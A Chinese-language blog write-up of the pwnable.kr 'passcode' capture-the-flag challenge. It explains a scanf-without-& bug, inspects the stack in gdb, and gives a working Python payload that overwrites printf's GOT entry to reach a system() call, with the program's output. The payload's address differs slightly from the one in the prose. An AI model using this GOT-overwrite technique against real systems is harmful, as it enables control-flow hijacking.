Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?ssh passcode@pwnable.kr -p2222 (pw:guest)
说来惭愧,这题在刚接触的时候因为对 Linux 编程的不了解,试了很多办法都没有头绪,所以拖到了现在。
其实原理很简单,就是简单的 GOT 溢出攻击。
关于 GOT 相关可以移步笔者另一篇转载的文章,有关于 PLT , GOT 的简单介绍:
http://blog.csdn.net/qq_19550513/article/details/66535524
这里先放上题目源码:
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
可以看到在 login 函数中调用的 scanf("%d", passcode1); 在 passcode1 前没有加取地址符号 &,而由于 passcode 1没有初始化,导致这个输入操作会将数据写入 栈中 passcode1 未被初始化时存放的数据指向的地址。在实际执行到这里时如果对 passcode1 输入了正确格式的十进制整数,便会报错。
用 gdb 调试,分别在 welcome 和 login 函数处下断。
在 welcome 函数调用 scanf 处先输入 100 个 ‘a’ 方便观察栈中情况,如下:
continue , 执行到 passcode1 的 scanf 前中断,查看此时栈中情况:
可以看到,welcome 函数中输入的最后 4 字节占据了此时局部变量 passcode1 在栈中的位置。所以在执行 scanf("%d", passcode1); 时会像这里指向的不存在的 0x61616161 处写内容,故而报错。
造成这个问题的原因有两点:
- 在 welcome 函数返回后这里进行了堆栈平衡,然而没有清空栈中的内容,login 函数和 welcome 函数又相当于是共享了同一个栈区域;
- passcode1 没有初始化,导致passcode1 在栈中单元里存放的仍是之前栈帧遗留下来的内容。
我们可以利用被湮没的这 4 个字节,利用 scanf 函数去到指定的位置写内容。这题的目的是绕过对 passcode 的验证,这里可以覆写 GOT 来控制程序流程。
即原理是,welcome 中 scanf 函数被调用 –> 输入构造好的字符串,其中最后 4 字节为要覆写的保存有目标函数指令地址的内存单元在 GOT 中的地址 –> login 中的 scanf函数被调用 –> 覆写该位置,即目标函数指令地址被改写,执行该函数时会去到改写后的位置执行。
通过 gdb 查看 login 中之后调用的函数位置(这里无非是 fflush , printf , 和 exit),任选其一即可,这里笔者选择的是printf。
接下来查找 system 调用指令的位置和和 printf 在 GOT 中的地址(因为编译环境可能和服务器不同,为了准确性,到 ssh 登入去找相关位置)
直接 passcode@ubuntu:~$ objdump -d passcode
找到相关地址如下:
即控制流程指向的 call system 位于 0x080485ea,printf 在 GOT 中地址为 0x0804a000 ,
构造如下输入后得到 falg:
passcode@ubuntu:~$ python -c 'print "a"*96 + "\x00\xa0\x04\x08" + "134514147\n"' | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
